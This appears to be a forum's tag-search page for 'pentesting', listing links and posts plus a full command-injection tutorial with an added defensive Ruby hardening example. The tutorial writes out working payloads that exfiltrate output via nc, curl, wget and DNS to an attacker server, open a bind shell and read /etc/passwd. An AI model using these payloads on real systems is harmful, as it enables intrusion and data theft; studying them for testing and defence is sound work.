Showing results for tags 'pentesting'.



Found 14 results

  1. Venom psh-cmd-exe persistence payload Tutorial - By Spirit

    Hello guys, I am Spirited wolf as you all know, and today I'm here to demonstrate a tutorial on Persistence using Metasploit-Framework. So, for this we will use Venom - The Shellcode Generator.

    Tutorial Link: Venom Tutorial link

    So, Venom is a toolkit designed by my friend and it's really a very awesome toolkit. You can download it from here: https://sourceforge.net/projects/crisp-shellcode-generator/ (Point to remember: the version that I am using is currently in Developer Stage, you can't download it.)

    This Tutorial is for educational purpose only, I'll not be responsible for any Harm.

    Please Subscribe My Channel If you like it: www.youtube.com/c/Pentestingwithspirit
    Please Like My Facebook Page: www.facebook.com/Pentestingwithspirit
    Follow me on Twitter: @spirit3113
  2. A complete guide to SQL Injection in which you will design your own lab and learn to attack it. Pentesting + Hacking + SQLI Page: SQL Injection Master Course Price: €337
  3. A command injection is a class of vulnerabilities where the attacker can control one or multiple commands that are being executed on a system. This post will go over the impact, how to test for it, defeating mitigations, and caveats.

    Before diving into command injections, let's get something out of the way: a command injection is not the same as a remote code execution (RCE). The difference is that with an RCE, actual programming code is executed, whereas with a command injection, it's an (OS) command being executed. In terms of possible impact, this is a minor difference, but the key difference is in how you find and exploit them.

    Setting up

    Let's start by writing two simple Ruby scripts that you can run locally to learn finding and exploiting command injection vulnerabilities. I used Ruby 2.3.3p222. Below is ping.rb.

        puts `ping -c 4 #{ARGV[0]}`

    This script will ping the server that's being passed to the script as argument. It will then return the command output on the screen. Example output below.

        $ ruby ping.rb '8.8.8.8'
        PING 8.8.8.8 (8.8.8.8): 56 data bytes
        64 bytes from 8.8.8.8: icmp_seq=0 ttl=46 time=23.653 ms
        64 bytes from 8.8.8.8: icmp_seq=1 ttl=46 time=9.111 ms
        64 bytes from 8.8.8.8: icmp_seq=2 ttl=46 time=8.571 ms
        64 bytes from 8.8.8.8: icmp_seq=3 ttl=46 time=20.565 ms

        --- 8.8.8.8 ping statistics ---
        4 packets transmitted, 4 packets received, 0.0% packet loss
        round-trip min/avg/max/stddev = 8.571/15.475/23.653/6.726 ms

    As you can see, it executed ping -c 4 8.8.8.8 and displayed the output on the screen. Here's another script that will be used in the blog post: server-online.rb.

        puts `ping -c 4 #{ARGV[0]}`.include?('bytes from') ? 'yes' : 'no'

    This script will determine whether the server is online based on an ICMP response (ping). If it responds to the ping request, it'll display yes on the screen. In case it doesn't, it'll display no. The output of the command isn't returned to the user. Example output below.

        $ ruby server-on.rb '8.8.8.8'
        yes
        $ ruby server-on.rb '8.8.8.7'
        no

    Testing

    One of the best ways to detect a first-order command injection vulnerability is trying to execute a sleep command and determine if the execution time increases. To start with this, let's establish a time baseline for the ping.rb script:

        $ time ruby ping.rb '8.8.8.8'
        PING 8.8.8.8 (8.8.8.8): 56 data bytes
        ...
        0.09s user 0.04s system 4% cpu 3.176 total

    Notice that executing the script takes about 3 seconds. Now let's determine if the script is vulnerable to a command injection by injecting a sleep command.

        $ time ruby ping.rb '8.8.8.8 && sleep 5'
        PING 8.8.8.8 (8.8.8.8): 56 data bytes
        ...
        0.10s user 0.04s system 1% cpu 8.182 total

    The script will now execute the command ping -c 4 8.8.8.8 && sleep 5. Notice the execution time again: it jumped from ~3 seconds to ~8 seconds, which is an increase of exactly 5 seconds. There can still be unexpected delays on the internet, so it's important to repeat the injection and play with the amount of seconds to make sure it's not a false positive. Let's determine whether the server-online.rb script is vulnerable, too.

        $ time ruby server-online.rb '8.8.8.8'
        yes
        0.10s user 0.04s system 4% cpu 3.174 total
        $ time ruby server-online.rb '8.8.8.8 && sleep 5'
        yes
        0.10s user 0.04s system 1% cpu 8.203 total

    Again, the baseline shows executing a normal request takes about 3 seconds. Adding && sleep 5 to the command increases the time to 8 seconds. Depending on the command being executed, the sleep command may be injected differently. Here are a few payloads that you can try when looking for command injections (they all work):

        time ruby ping.rb '8.8.8.8`sleep 5`'

    When a command line gets parsed, everything between backticks is executed first. Executing echo `ls` will first execute ls and capture its output. It'll then pass the output to echo, which displays the output of ls on the screen. This is called command substitution. Since execution of the command between backticks takes precedence, it doesn't matter if the command executed afterwards fails. Below is a table of commands with injected payloads and their result. The injected payload is marked in green.

        Command                                Result
        ping -c 4 8.8.8.8`sleep 5`             sleep command executed, command substitution works in command line.
        ping -c 4 "8.8.8.8`sleep 5`"           sleep command executed, command substitution works in complex strings (between double quotes).
        ping -c 4 $(echo 8.8.8.8`sleep 5`)     sleep command executed, command substitution works in command substitution when using a different notation (see example below).
        ping -c 4 '8.8.8.8`sleep 5`'           sleep command not executed, command substitution does not work in simple strings (between single quotes).
        ping -c 4 `echo 8.8.8.8`sleep 5``      sleep command not executed, command substitution does not work when using the same notation.

        time ruby ping.rb '8.8.8.8$(sleep 5)'

    This is a different notation for command substitution. This may be useful when backticks are filtered or encoded. When using command substitution to look for command injections, make sure to test both notations to avoid true-negatives in case the payload is already being substituted (see last example in table above).

        time ruby ping.rb '8.8.8.8; sleep 5'

    Commands are executed in a sequence (left to right) and they can be separated with semicolons. When a command in the sequence fails it won't stop executing the other commands. Below is a table of commands with injected payloads and their result. The injected payload is marked in green.

        Command                                Result
        ping -c 4 8.8.8.8;sleep 5              sleep command executed, sequencing commands works when used on the command line.
        ping -c 4 "8.8.8.8;sleep 5"            sleep command not executed, the additional command is injected in a string, which is passed as argument to the ping command.
        ping -c 4 $(echo 8.8.8.8;sleep 5)      sleep command executed, sequencing commands works in command substitution.
        ping -c 4 '8.8.8.8;sleep 5'            sleep command not executed, the additional command is injected in a string, which is passed as argument to the ping command.
        ping -c 4 `echo 8.8.8.8;sleep 5`       sleep command executed, sequencing commands works in command substitution.

        time ruby ping.rb '8.8.8.8 | sleep 5'

    Command output can be piped, in sequence, to other commands. When executing cat /etc/passwd | grep root, it'll capture the output of the cat /etc/passwd command and pass it to grep root, which will then show the lines that match root. When the first command fails, it'll still execute the second command. Below is a table of commands with injected payloads and their result. The injected payload is marked in green.

        Command                                Result
        ping -c 4 8.8.8.8 | sleep 5            sleep command executed, piping output works when used on the command line.
        ping -c 4 "8.8.8.8 | sleep 5"          sleep command not executed, the additional command is injected in a string, which is passed as argument to the ping command.
        ping -c 4 $(echo 8.8.8.8 | sleep 5)    sleep command executed, piping output works in command substitution.
        ping -c 4 '8.8.8.8 | sleep 5'          sleep command not executed, the additional command is injected in a string, which is passed as argument to the ping command.
        ping -c 4 `echo 8.8.8.8 | sleep 5`     sleep command executed, piping output works in command substitution.

    Exploiting

    To exploit the vulnerability for evidence, determine whether it's a generic or blind command injection. The difference between the two is that a blind command injection doesn't return the output of the command in the response. A generic command injection would return the output of the executed command(s) in the response. The sleep command is often a good proof of concept for either flavor. However, if you need more proof, execute id, hostname, or whoami and use the output as additional proof. The server's hostname is useful to determine how many servers are affected and helps the vendor to get a sense of impact faster.

    Important: needless to say, most companies don't appreciate you snooping around on their systems. Before exploiting the vulnerability to pivot into something else, ask the company for permission. In nearly all situations, proving that you can execute arbitrary but harmless commands like sleep, id, hostname or whoami is enough to prove impact to the affected company.

    Exploiting generic command injection

    This is usually pretty straightforward: the output of any injected command will be returned to the user:

        $ ruby ping.rb '8.8.8.8 && whoami'
        PING 8.8.8.8 (8.8.8.8): 56 data bytes
        64 bytes from 8.8.8.8: icmp_seq=0 ttl=46 time=9.008 ms
        64 bytes from 8.8.8.8: icmp_seq=1 ttl=46 time=8.572 ms
        64 bytes from 8.8.8.8: icmp_seq=2 ttl=46 time=9.309 ms
        64 bytes from 8.8.8.8: icmp_seq=3 ttl=46 time=9.005 ms

        --- 8.8.8.8 ping statistics ---
        4 packets transmitted, 4 packets received, 0.0% packet loss
        round-trip min/avg/max/stddev = 8.572/8.973/9.309/0.263 ms
        jobert

    The red part shows the output of the ping command. The green text is the output of the whoami command. From this point, you can gather evidence for your proof of concept. Again, stick to harmless commands.

    Exploiting blind command injection

    With blind command injections the output isn't returned to the user, so we should find other ways to extract the output. The most straightforward technique is to offload the output to your server. To simulate this, run nc -l -n -vv -p 80 -k on your server and allow inbound connections on port 80 in your firewall. Once you've set up the listener, use nc, curl, wget, telnet, or any other tool that sends data to the internet, to send the output to your server:

        $ ruby server-online.rb '8.8.8.8 && hostname | nc IP 80'
        yes

    Then observe a connection being made to your server that shows the output of the hostname command:

        $ nc -l -n -vv -p 80 -k
        Listening on [0.0.0.0] (family 0, port 81)
        Connection from [1.2.3.4] port 80 [tcp/*] accepted (family 2, sport 64225)
        hacker.local

    In the example above, nc is used to send the output of the command to your server. However, nc might be deleted or unable to execute. To avoid going down a rabbit hole, there are a few simple payloads to determine if a command exists. In case any of the commands increases the time by 5 seconds, you know the command exists.

        curl -h && sleep 5
        wget -h && sleep 5
        ssh -V && sleep 5
        telnet && sleep 5

    When you've determined a command exists, you can use any of those commands to send the output of a command to your server, like this:

        whoami | curl http://your-server -d @-
        wget http://your-server/$(whoami)
        export C=whoami | ssh user@your-server

    (set up the user account on your-server to authenticate without a password and log every command being executed)

    Even though the server-online.rb script doesn't output the result of the hostname command, the output can be sent to a remote server and obtained by an attacker. In some cases, outbound TCP and UDP connections are blocked. It's still possible to extract the output in that case, we just have to do a little bit more work. In order to extract the output, we have to guess the output based on something that we can change. In this case, the execution time can be increased using the sleep command. This can be used to extract the output. The trick here is to pass the result of a command to the sleep command. Here's an example: sleep $(hostname | cut -c 1 | tr a 5). Let's analyze this for a moment. It's executing the hostname command. Let's assume it returns hacker.local. It'll take that output and pass it to cut -c 1. This will take the first character of hacker.local, which is the character h. It passes it to tr a 5, which will replace the character a with a 5 in the output of the cut command (h). The output of the tr command is then passed to the sleep command, resulting in sleep h being executed. This will immediately error, since sleep can only take a number as first argument. The goal is then to iterate over the characters with the tr command. Once you execute sleep $(hostname | cut -c 1 | tr h 5), the command will take 5 seconds longer to execute. This is how you determine that the first character is an h. Once you've guessed a character, increase the number you pass to the cut -c command, and repeat. Here's a table with the commands to determine the output:

        Command                                                                  Time  Result
        ruby server-online.rb '8.8.8.8;sleep $(hostname | cut -c 1 | tr a 5)'    3s    -
        ruby server-online.rb '8.8.8.8;sleep $(hostname | cut -c 1 | tr h 5)'    8s    h
        ruby server-online.rb '8.8.8.8;sleep $(hostname | cut -c 2 | tr a 5)'    8s    a
        ruby server-online.rb '8.8.8.8;sleep $(hostname | cut -c 3 | tr a 5)'    3s    -
        ruby server-online.rb '8.8.8.8;sleep $(hostname | cut -c 3 | tr c 5)'    8s    c

    To determine how many characters you need to guess: pipe the output of hostname to wc -c and pass that to the sleep command. hacker.local is 12 characters. The hostname command returns the hostname and a new line, so wc -c will return 13. We established that normally, the script takes 3 seconds to complete.

        $ time ruby server-online.rb '8.8.8.8 && sleep $(hostname | wc -c)'
        yes
        0.10s user 0.04s system 0% cpu 16.188 total

    The payload above shows that the script now takes 16 seconds to complete, which means the output of hostname is 12 characters: 16 - 3 (baseline) - 1 (new line) = 12 characters. When executing this payload on a web server, know that the output may change: the length of the hostname could change when requests are handled by different servers.

    The technique above works fine for smaller outputs, but can take a long time for reading a file. Some of the following methods can be pretty intrusive, so always make sure the company gave you a thumbs up to use more invasive extraction methods. In case outbound connections are blocked and the output is too long to read, here are a few other tricks to try (useful during CTFs):

    • Run a port scan on the server and based on the exposed services, determine a way to extract the output.
      • FTP: try writing the file to a directory you can download files from.
      • SSH: try writing the output of the command to the MOTD banner, then simply SSH to the server.
      • Web: try writing the output of the command to a file in a public directory (/var/www/).
    • Spawn a shell on a port that can be reached from the outside (only available in custom netcat build): nc -l -n -vv -p 80 -e /bin/bash (unix) or nc -l -n -vv -p 80 -e cmd.exe (windows).
    • Do a DNS query with dig or nslookup to send the output to port 53 (UDP): dig `hostname` @your-server or nslookup `hostname` your-server. Output can be captured with nc -l -n -vv -p 53 -u -k on your server. This may work because outbound DNS traffic is often allowed. Check out this tweet on how to offload file contents with dig.
    • Change the ICMP packet size when pinging your server to offload data. tcpdump can be used to capture the data. Check out this tweet on how to do this.

    There are plenty of other ways, but it often depends on what kind of options the server gives you. The techniques shown above are most common when exploiting command injection vulnerabilities. The key is to use what you have to extract the output!

    Defeating mitigations

    Sometimes mitigations have been put in place, which may cause the above techniques not to work. One of the mitigations that I've seen over the years is a restriction on whitespace in the payload. Luckily, there's something called Brace Expansion that can be used to create payloads without whitespace. Below is ping-2.rb, which is the second version of ping.rb. Before passing the user input to the command, it removes whitespace from the input.

        puts `ping -c 4 #{ARGV[0].gsub(/\s+?/,'')}`

    When passing 8.8.8.8 && sleep 5 as argument, it'd execute ping -c 4 8.8.8.8&&sleep5, which will result in an error showing that the command sleep5 isn't found. There's an easy workaround by using brace expansion:

        $ time ruby ping-2.rb '8.8.8.8;{sleep,5}'
        ...
        0.10s user 0.04s system 1% cpu 8.182 total

    Here's a payload that sends the output of a command to an external server without using whitespace:

        $ ruby ping.rb '8.8.8.8;hostname|{nc,192.241.233.143,81}'
        PING 8.8.8.8 (8.8.8.8): 56 data bytes
        ...

    Or to read /etc/passwd:

        $ ruby ping.rb '8.8.8.8;{cat,/etc/passwd}'
        PING 8.8.8.8 (8.8.8.8): 56 data bytes
        64 bytes from 8.8.8.8: icmp_seq=0 ttl=46 time=9.215 ms
        64 bytes from 8.8.8.8: icmp_seq=1 ttl=46 time=10.194 ms
        64 bytes from 8.8.8.8: icmp_seq=2 ttl=46 time=10.171 ms
        64 bytes from 8.8.8.8: icmp_seq=3 ttl=46 time=8.615 ms

        --- 8.8.8.8 ping statistics ---
        4 packets transmitted, 4 packets received, 0.0% packet loss
        round-trip min/avg/max/stddev = 8.615/9.549/10.194/0.668 ms
        ##
        # User Database
        #
        # Note that this file is consulted directly only when the system is running
        # in single-user mode. At other times this information is provided by
        # Open Directory.
        ...

    Whenever a command is being executed with user input, mitigations have to be put in place by the developer. Developers take different routes to implement mitigations, so it's up to you to discover what they did and how to work around them. Happy hacking! Jobert.

    Source :
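As an added example (not part of Jobert's post), the ping.rb construction and the ping-2.rb whitespace filter are placed beside a hardened version that allowlists the host and spawns ping as an argv array with no shell. The function names and the hostname regex are my own; the payload list is copied from the post above and reused as test input.

```ruby
require 'open3'
require 'ipaddr'

# Payloads quoted from the post above, reused here as constructed test input.
INJECTION_PAYLOADS = [
  '8.8.8.8 && sleep 5',
  '8.8.8.8`sleep 5`',
  '8.8.8.8$(sleep 5)',
  '8.8.8.8; sleep 5',
  '8.8.8.8 | sleep 5',
  '8.8.8.8;{sleep,5}',          # brace expansion: no whitespace needed
  '8.8.8.8;{cat,/etc/passwd}',
].freeze

# Vulnerable construction, identical to ping.rb: backticks hand this one
# string to /bin/sh, so every shell metacharacter in `target` is parsed.
def vulnerable_command(target)
  "ping -c 4 #{target}"
end

# The ping-2.rb mitigation: a blocklist that only strips whitespace.
# Brace expansion walks straight past it, as the post shows.
def whitespace_stripped(target)
  target.gsub(/\s+?/, '')
end

# Hardening step 1: allowlist the argument. Accept an IPv4/IPv6 literal
# or an RFC 1123 hostname (letters, digits, hyphens, dots; a label cannot
# start with '-', so the value can never be mistaken for a ping option).
HOSTNAME_RE = /\A(?=.{1,253}\z)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\z/i

def validate_host(input)
  return nil unless input.is_a?(String)
  s = input.strip
  begin
    return IPAddr.new(s).to_s   # normalised IP literal
  rescue ArgumentError          # IPAddr::InvalidAddressError < ArgumentError
    # not an IP literal; fall through to the hostname check
  end
  HOSTNAME_RE.match?(s) ? s : nil
end

# Hardening step 2: no shell. An argv array makes Open3 exec() ping
# directly; ';', '|', backticks and braces are then plain bytes inside a
# single argument that ping sees as a (bad) hostname, never as commands.
def ping_argv(input)
  host = validate_host(input)
  raise ArgumentError, "refusing to ping #{input.inspect}" if host.nil?
  ['ping', '-c', '4', host]
end

# Hardened server-online.rb: same yes/no answer, no command injection.
def server_online_status(input)
  out, status = Open3.capture2e(*ping_argv(input))
  status.success? && out.include?('bytes from') ? 'yes' : 'no'
end

# Side-by-side view of what each approach does with every payload.
def compare(payloads = INJECTION_PAYLOADS)
  payloads.map do |p|
    {
      payload:         p,
      shell_receives:  vulnerable_command(p),   # ping.rb: injected as-is
      after_blocklist: whitespace_stripped(p),  # ping-2.rb: metachars survive
      allowlisted:     validate_host(p),        # hardened: nil = rejected
    }
  end
end

if __FILE__ == $PROGRAM_NAME
  compare.each { |row| puts row.inspect }
  puts ping_argv('8.8.8.8').inspect   # ["ping", "-c", "4", "8.8.8.8"]
end
```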
  4. Hi all, while surfing various IRC channels, I have come across a list of very useful links and courses to get into hacking. URL: https://ghostbin.com/paste/j858d There are courses for computer basics, hacking, programming and many more. Good luck on your long journey of learning!
  5. Hi, another great resource for pentesting and programming is edX. They have some free and paid courses. Worth taking a look.

    Software Development Fundamentals: https://www.edx.org/course/software-development-fundamentals-pennx-sd1x
    Intro to Computing using Python: https://www.edx.org/course/introduction-computing-using-python-gtx-cs1301x
    Data Science Orientation: https://www.edx.org/course/data-science-orientation-microsoft-dat101x-2
    How VR Works: https://www.edx.org/course/how-virtual-reality-vr-works-uc-san-diegox-cse165x
    Comp Sci Essentials for software development: https://www.edx.org/professional-certificate/computer-science-essentials-software
    Java and Android foundation: https://www.edx.org/professional-certificate/java-android-foundation
    Software Development: https://www.edx.org/micromasters/software-development
    Machine Learning: https://www.edx.org/course/machine-learning-columbiax-csmm-102x-0
    Artificial Intelligence: https://www.edx.org/course/artificial-intelligence-ai-columbiax-csmm-101x-0
    How to Code: simple data: https://www.edx.org/course/how-code-simple-data-ubcx-htc1x
    Professional Android App Development: https://www.edx.org/course/professional-android-app-development-galileox-caad003x

    There are many more courses to be explored; these are just some courses I find interest in. Good luck.
  6. Hi all, there is a website that I found where you can practice your website hacking skills. There are 50 vulnerabilities to be found; this website goes along with the courses from my previous course where I provide a URL with a plethora of courses. The URL of this website: http://hackyourselffirst.troyhunt.com/ Good luck.
  7. NoBody.

    nobody.

    Hi, I'm nobody and I'm from Russia, sorry for my bad English, I use Google Translate in most cases. My skills: pentesting and web design (full template)
  8. Hello all, my name is Iulian, I am very passionate about this field, especially pentesting; I joined this community to learn many new things and I think I've come to the right place. I hope that one day Romania will reach the top in this field and that people will speak only well of us. I'm not exactly a beginner, but I'm not far from it either, so if you'd be kind enough to give me some more advanced pentesting tutorials I'd be very glad. Thanks in advance. And don't forget: respect, and you will be respected.
  9. Bugtroid is an innovative tool developed by the BugTraq-Team. The main feature of this application is that it has more than 200 tools for Android and Linux (PRO) for pentesting. It has a menu classified by the nature of the tool, where you can find:

    1. Anonymity: Proxy Browser Clean Master QuickLab cleaner Orbot Fakegps ChangeMac Orweb Proxydroid IP Checker Proxy server Direccion IP Spy Kit-Universal Mailer
    2. 802.11 (WIFI): Claves wifi Wifi Analyzer WifiLeaks Mac2wepkey WifiKill Wifi Radar Airmon
    3. BruteForce: Router Brute Force Routerpwn WIBR
    4. DDOS: AnDOsid Droidswarm Loic 1 Loic 2 SMS Bomber SMS reliator OFS Doser
    5. Crypto: HashDroid HashDecrypt Cryptonite APG CrypticSMS HashPass
    6. Forensics: Loggy Wifi Credetials Recovery Undelete CellID Info aLogcat Exit Viewer
    7. Networking: Wirless teher Netowrk port database aNmap Foxfi Fing AndFTP AndSMB Wake on Lan ConnectBot SSHtunel Connect SQL
    8. Pentesting: Bulbsecurity framework Nessus Zanti Dsploit Wifiinspect
    9. People Search: 123people Gmon2 Wigle Wifi Wardriving People Search Search People KGB People
    9. Remote: Flu Client DynDNS Blue Remote No-Ip Airdroid TeamViewer Android VNC
    10. Scripting: Scripting for android Perl for android Python for android Llama Script Launcher
    11. Security: Stripg Guard Keepass Droidwall Wifi Protector BLacklist apk Security Key Generator RedPhone DroidSheep Guard
    12. Sniffers: SSLStrip Droid Sniff Droidsheep Dsploit Shark Shark Reader Facesniff ArpSpoof Intercepter-NG
    13. System: Root Browser Autorun Cpuoverlay Zarchiver Osmonitor ROM toolbox Lite androPHP
    14. Web: Admin Panel Finder
    15. AVs: VirusTotal Zoner Antivirus Antivirus Dr Web Avast Avira

    Download: DepositFiles
  10. I'm starting the OSCP course on Feb 7 and I'm curious whether there are other members here who have started the course or have finished it and obtained the certificate. I chose the 60-day option because I haven't "played" with pentesting for a while and I've gotten rusty. I stayed away from pentesting courses for a long time because it's a different branch of IT, and I chose to work with networks, servers, virtual systems and desktops instead. Awaiting replies!
  11. Brief contents

    Chapter 1: Setting Up Your Python Environment
    Chapter 2: The Network: Basics
    Chapter 3: The Network: Raw Sockets and Sniffing
    Chapter 4: Owning the Network with Scapy
    Chapter 5: Web Hackery
    Chapter 6: Extending Burp Proxy
    Chapter 7: GitHub Command and Control
    Chapter 8: Common Trojaning Tasks on Windows
    Chapter 9: Fun with Internet Explorer
    Chapter 10: Windows Privilege Escalation
    Chapter 11: Automating Offensive Forensics
    Index

    www.mediafire.com/download/r3g1pef6ccsbplc/Black.pdf
  12. Hello everyone. I recently spoke with Nytro about the biggest and most complex RST-branded project. It's a pentesting OS. I know Kali and BackTrack exist, but it would be nice... hard, but nice. We would implement classic tools as well as original RST ones. It would be something extraordinary, plus we would customise it as we wish and it would draw on all our knowledge. We need programmers, people for graphics, for collecting and implementing tools, etc. I don't need ironic comments; we need about 8-9 members. Does anyone want to get involved??
  13. We're always on the lookout for interesting ARM hardware for Kali Linux. Whether it's a Galaxy Note or a USB stick sized SS808, we want to see Kali run on it. You can therefore imagine our excitement when we first laid our eyes on the Utilite Pro. Utilite Pro is a quad core ARM Cortex-A9 machine with up to 4 GB of RAM, up to 512 GB mSATA SSD, HDMI and DVI-D output, dual (2x) 1GB NICs, a built-in wireless card and 4 USB ports. And it's fanless. With those type of specs, this little beauty was unlikely to skip our radars. We wanted Kali Linux on that baby, real bad.

    We took this opportunity to create and publish the Offensive Security Kali Linux contributed ARM images, and thought we'd demonstrate the use of these scripts, and show you how to get Kali Linux on the Utilite Pro. From there, the options are endless.

    The Utilite Pro came with Ubuntu preinstalled. The first thing we wanted to do is update the machine's U-Boot bootloader image, to allow for support of 1.8V microSD cards.

        root@utilite:~# apt-get install mtd-utils
        root@utilite:~# git clone https://github.com/offensive-security/kali-uboot-images.git uboot
        root@utilite:~/uboot# ./cm-fx6-bootloader-update.sh
        CompuLab CM-FX6 (Utilite) boot loader update utility 1.1 (Nov 25 2013)
        >> Checking for utilities...
        >> ...Done
        >> Board CPU: mx6q
        >> Board DRAM: 2gb
        >> Looking for boot loader image file: cm-fx6-u-boot-mx6q-2gb
        >> ...Found
        >> Looking for SPI flash: mtd0
        >> ...Found
        >> Current U-Boot version in SPI flash: U-Boot 2009.08-cm-fx6-0.87+tools (Oct 06 2013 - 13:46:27)
        >> New U-Boot version in file: (248K)
        >> Proceed with the update?
        1) Yes
        2) No
        #? Yes
        ** Do not power off or reset your computer!!!
        >> Erasing SPI flash...
        Erasing 4 Kibyte @ bf000 -- 100 % complete
        >> ...Done
        >> Writing boot loader to the SPI flash...
        ...........
        >> ...Done
        >> Checking boot loader in the SPI flash...
        .
        >> ...Done
        >> Boot loader update succeeded!
        root@utilite:~/uboot#

    Once that was done, we whipped out our Offensive Security Trusted Contributed ARM image scripts, and let our Utilite image builder script loose. On a separate 32 bit Kali Linux machine, we set up all the pre-requisites to build our ARM image, and make sure we have at least 10GB of free space. We start with downloading and setting up the ARM cross compiler and the build scripts:

        root@builder:~# git clone https://github.com/offensive-security/kali-arm-build-scripts.git
        Cloning into 'kali-arm-build-scripts'...
        remote: Counting objects: 95, done.
        remote: Compressing objects: 100% (57/57), done.
        remote: Total 95 (delta 62), reused 70 (delta 37)
        Unpacking objects: 100% (95/95), done.
        root@builder:~# git clone https://github.com/offensive-security/gcc-arm-linux-gnueabihf-4.7.git
        Cloning into 'gcc-arm-linux-gnueabihf-4.7'...
        remote: Counting objects: 5839, done.
        remote: Compressing objects: 100% (3105/3105), done.
        remote: Total 5839 (delta 2559), reused 5837 (delta 2559)
        Receiving objects: 100% (5839/5839), 74.64 MiB | 3.38 MiB/s, done.
        Resolving deltas: 100% (2559/2559), done.
        root@builder:~#

    Once that's done, we next run the build-deps script, which will install all the dependencies required for the build:

        root@builder:~# cd kali-arm-build-scripts/
        root@builder:~/kali-arm-build-scripts# ./build-deps.sh
        Reading package lists... Done
        Building dependency tree
        Reading state information... Done
        abootimg is already the newest version.
        ...

    Now with everything in place, we kick off our Utilite image builder script, and go for a coffee, or six. The script requires a version parameter for the image, which is something we use to tag our ARM image versions. Once ready, you should get a *full* Kali Linux image which can then be dd'ed to a microSD card. Of course, you are encouraged to read the build script, and edit any installation parameters or packages to your needs.

        root@builder:~/kali-arm-build-scripts# ./utilite.sh 1.0
        I: Retrieving Release
        I: Retrieving Release.gpg
        I: Checking Release signature
        I: Valid Release signature (key id 44C6513A8E4FB3D30875F758ED444FF07D8D0BF6)
        I: Retrieving Packages
        I: Validating Packages
        I: Resolving dependencies of required packages...
        I: Resolving dependencies of base packages...
        ...
        ...
        ...
        Cloning into 'firmware'...
        remote: Counting objects: 874, done.
        remote: Compressing objects: 100% (685/685), done.
        remote: Total 874 (delta 181), reused 849 (delta 167)
        Receiving objects: 100% (874/874), 30.17 MiB | 4.84 MiB/s, done.
        Resolving deltas: 100% (181/181), done.
        del devmap : loop0p2
        del devmap : loop0p1
        Removing temporary build files
        Generating sha1sum for kali-1.0-utilite.img
        Compressing kali-1.0-utilite.img
        Generating sha1sum for kali-1.0-utilite.img.xz
        root@builder:~/kali-arm-build-scripts#

    Once the image is ready, you can find it in the utilite subdirectory created by the script:

        root@builder:~/kali-arm-build-scripts# ls -l utilite-1.0/
        total 334720
        -rw-r--r-- 1 root root        63 Dec  7 23:48 kali-1.0-utilite.img.sha1sum
        -rw-r--r-- 1 root root 342742176 Dec  7 23:52 kali-1.0-utilite.img.xz
        -rw-r--r-- 1 root root        66 Dec  7 23:53 kali-1.0-utilite.img.xz.sha1sum
        root@builder:~/kali-arm-build-scripts#

    Extract the compressed image file, and dd it to the microSD card (in our case, sdb). Once done, pop the microSD card into the Utilite, and boot it up!

        root@proxy:~/kali-arm-build-scripts# cd utilite-1.0/
        root@proxy:~/kali-arm-build-scripts/utilite-1.0# 7z x kali-1.0-utilite.img.xz

        7-Zip [64] 9.20  Copyright (c) 1999-2010 Igor Pavlov  2010-11-18
        p7zip Version 9.20 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,4 CPUs)

        Processing archive: kali-1.0-utilite.img.xz

        Extracting  kali-1.0-utilite.img

        Everything is Ok

        Size:       7340032000
        Compressed: 342742176
        root@proxy:~/kali-arm-build-scripts/utilite-1.0# dd if=kali-1.0-utilite.img of=/dev/sdb bs=1M

    Once booted, you can log into the Utilite image with root / toor credentials.

        root@kali:~# uname -a
        Linux kali 3.0.35-cm-fx6-4 #1 SMP Sat Dec 7 23:47:48 EST 2013 armv7l GNU/Linux
        root@kali:~# cat /proc/cpuinfo
        Processor       : ARMv7 Processor rev 10 (v7l)
        processor       : 0
        BogoMIPS        : 790.52

        processor       : 1
        BogoMIPS        : 790.52

        processor       : 2
        BogoMIPS        : 790.52

        processor       : 3
        BogoMIPS        : 790.52

        Features        : swp half thumb fastmult vfp edsp neon vfpv3
        CPU implementer : 0x41
        CPU architecture: 7
        CPU variant     : 0x2
        CPU part        : 0xc09
        CPU revision    : 10

        Hardware        : Compulab CM-FX6
        Revision        : 63012
        Serial          : 0b0991d4d81917c9
        root@kali:~# cat /proc/meminfo
        MemTotal:        2006440 kB
        MemFree:         1922864 kB
        ....

    More info & buy: Home | Utilite

    Source: Kali Linux Documentation
  14. alien

    A-Z Hacking Wiki

    Big tutorial database covering most important Pentesting topics, from Armitage to SQL injection. Penetration Testing Tips & Tricks - PaulDotCom Security Weekly